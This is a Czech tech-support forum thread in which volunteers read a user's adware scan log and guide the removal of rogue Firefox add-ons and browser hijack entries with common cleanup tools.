PUP.Optional.MultiPlug.A, C:\ProgramData\priCEchop\qTdKFb2.dat, , [c9ab9f29e794f64076e3d6fe9171a45c],
PUP.Optional.MultiPlug.A, C:\Program Files (x86)\priCEchop\E05zLS.dat, , [acc85672f18a6fc73c1ea92b778b11ef],
PUP.Optional.MultiPlug.A, C:\Program Files (x86)\priCEchop\E05zLS.tlb, , [acc85672f18a6fc73c1ea92b778b11ef],
PUP.Optional.Booster.A, C:\ProgramData\PlutoApp\SW-Booster\2060245759.ini, , [284c03c589f21d19c004f8e7ea1806fa],
PUP.Optional.WonderfulSearches.A, C:\Users\Jakub\AppData\Roaming\Mozilla\Firefox\Profiles\xlin0hej.default\prefs.js, Good: (), Bad: (user_pref("keyword.URL", "http://websearch.wonderfulsearches.info/?pid=2145&r=2014/08/17&hid=2400403269968452107&lg=EN&cc=CZ&unqvl=60&l=1&q=");), ,[3e36b612b7c40b2b6fa6fc0e798c2fd1]

Physical Sectors: 0
(No malicious items detected)

(end)

Vlož sem uvedenou hlášku Avastu.

Ty hlášky se mění. Po spuštění Firefoxu vyskočí například 5 hlášek z různými pěti URL...

Jasně to mi stačí. Dělá to některý z doplňků Firefoxu. Již se nepamatuji jaký. Zakaž 2 -3 a restartuj Firefox. Pokud jsi zakázal ten správný, hlášky Avastu se již neozvou. V opačném případě zakázané poval a zakaž další a opět restartuj Firefox.

Mockrát děkuji za pomoc. Používám jen 3 doplňky (AdBlock Plus, Avast a SpeedDial). Objevilo se mi tam asi dalších pět s podivnými názvy. Nejde mi ale do hlavy, jak se tam dostaly...

Takže vyřešeno? Počkej si ještě na stanovisko virobijců, zda nemáš ještě jiný problém.
Virobijcům se omlouvám za vstup do jejich království.

Problém vyřešen. Ještě jednou díky za radu

. Myslím, že práce virobijců už nebude potřeba...

Nic Tě to nestojí, jen čas. Tak vyčkej na jejich stanovisko k logu. Jestliže jsi uvedené doplňky neinstaloval, tak to mohl být nějaký vir, který máš ještě v PC.

ještě to projedem:

Spusť znovu AdwCleaner (u Windows Vista či Windows7, klikni na AdwCleaner pravým a vyber „Spustit jako správce“
klikni na „Prohledat-Scan“, po prohledání klikni na „ Vymazat-Clean“

Program provede opravu, po automatickém restartu neukáže log (C:\AdwCleaner [S?].txt) , jeho obsah sem celý vlož.

Stáhni si Junkware Removal Tool by Thisisu

na svojí plochu.

Deaktivuj si svůj antivirový program. Pravým tl. myši klikni na JRT.exe a vyber „spustit jako správce“. Pro pokračování budeš vyzván ke stisknutí jakékoliv klávesy. Na nějakou klikni.
Začne skenování programu. Skenování může trvat dloho , podle množství nákaz. Po ukončení skenu se objeví log (JRT.txt) , který se uloží na ploše.
Zkopíruj sem prosím celý jeho obsah.

. spusť znovu MbAM a dej Skenovat nyní
- po proběhnutí programu se ti objeví hláška tak klikni na „Vše do karantény(smazat vybrané)“ a na „Exportovat záznam“ a vyber „textový soubor“ , soubor nějak pojmenuj a někam ho ulož. Zkopíruj se celý obsah toho logu.

Stáhni si RogueKiller by Adlice Software
32bit.:
http://www.sur-la-toile.com/RogueKiller/RogueKiller.exe
64bit.:
http://www.sur-la-toile.com/RogueKiller ... lerX64.exe
na svojí plochu.
- Zavři všechny ostatní programy a prohlížeče.
- Pro OS Vista a win7 spusť program RogueKiller.exe jako správce , u XP poklepáním.
- počkej až skončí Prescan -vyhledávání škodlivých procesů.
- Zkontroluj , zda máš zaškrtnuto:
Kontrola MBR
Kontrola Faked
Antirootkit
-Potom klikni na „Prohledat“.
- Program skenuje procesy PC. Po proskenování klikni na „Zpráva“celý obsah logu sem zkopíruj.
Pokud je program blokován , zkus ho spustit několikrát. Pokud dále program nepůjde spustit a pracovat, přejmenuj ho na winlogon.exe.

PC-HELP.CZ

Antivir neustále hlásí problém - prosím o kontrolu logu

Antivir neustále hlásí problém - prosím o kontrolu logu Vyřešeno

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu

Re: Antivir neustále hlásí problém - prosím o kontrolu logu